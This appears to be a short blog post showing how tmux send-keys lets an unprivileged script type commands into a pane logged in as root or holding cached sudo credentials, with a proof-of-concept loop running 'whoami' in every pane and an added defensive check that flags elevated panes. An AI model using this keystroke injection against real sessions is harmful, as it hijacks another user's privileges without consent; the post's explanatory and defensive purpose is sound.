tmux privilege escalation abusing send-keys

A script run as an unprivileged user inside tmux can, under some circumstances, execute commands as root.

tl;dr

Did you know you can send keystrokes to other panes in tmux?
You can abuse send-keys to send commands to a root/sudo pane.
That's all there is to it, that's the trick.

send-keys

There's a tmux feature to send keystrokes to a pane.
tmux send-keys -t $pane 'C-c', for example, sends Ctrl-C to pane $pane, which delivers SIGINT to whatever is running in the foreground there.

man tmux

When I saw the send-keys feature, I was like:
"What if there's another pane, where the user is logged in as root?"

poc||gtfo

preparations

tmux     # start a new session
tmux sp  # split the window into two panes
su       # log in as root in the new pane

Now go back to the other tmux pane (where you are logged in as the unprivileged user).

action

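Now run the following script to execute whoami in every pane of the current window:

#!/bin/sh
# Loop over the index of every pane in the current window.
for pane in $(tmux list-panes -F '#{pane_index}'); do
    # Interrupt whatever is running in the pane's foreground.
    tmux send-keys -t "$pane" 'C-c'
    # Type the command and press Enter.
    tmux send-keys -t "$pane" 'whoami' Enter
done

As expected, in the pane where root is logged in, whoami returns root.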

sudo

With the same trick you can abuse the fact that sudo was used in another pane:

tmux send-keys -t "$pane" 'sudo whoami' Enter
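
A defensive check for the situation described above, as an added example that is not part of the original post: it flags tmux panes whose terminal hosts a process with a different effective UID than the pane owner, since those are the panes where injected keystrokes run with someone else's rights. The function names, the owner UID 1000 and the sample listings are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original post).
# To check a live system, save the two listings to files first:
#   tmux list-panes -a -F '#{pane_id} #{pane_tty}' > panes
#   ps -eo tty=,euid=,comm=                       > procs
#   flag_elevated_panes "$(id -u)" panes procs

# flag_elevated_panes OWNER_UID PANES_FILE PROCS_FILE
# Prints "pane_id tty euid comm" for each process on a pane tty whose
# effective UID differs from OWNER_UID (e.g. a root shell left open by su).
flag_elevated_panes() {
    awk -v owner="$1" '
        # First file: map tty name (without /dev/) to its pane id.
        NR == FNR { tty = $2; sub("^/dev/", "", tty); pane[tty] = $1; next }
        # Second file: report foreign-UID processes attached to a pane tty.
        ($1 in pane) && ($2 != owner) { print pane[$1], $1, $2, $3 }
    ' "$2" "$3"
}

# Constructed sample: three panes, one of them (%1) used for su.
sample_panes() {
    cat <<'EOF'
%0 /dev/pts/3
%1 /dev/pts/4
%10 /dev/pts/12
EOF
}

# Constructed sample of ps output: tty, effective UID, command name.
sample_procs() {
    cat <<'EOF'
pts/3 1000 zsh
pts/4 1000 zsh
pts/4 0 su
pts/4 0 bash
pts/9 0 bash
pts/12 1000 vim
? 0 sshd
EOF
}

# Run the check on the constructed sample and print the findings.
demo() {
    tmp=$(mktemp -d) || return 1
    sample_panes > "$tmp/panes"
    sample_procs > "$tmp/procs"
    flag_elevated_panes 1000 "$tmp/panes" "$tmp/procs"
    rm -rf "$tmp"
}
```

This only covers the su case, where a root process is visibly attached to the pane. For the sudo case, running `sudo -k` in the pane invalidates its cached credentials, so a later injected sudo command prompts for a password again.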
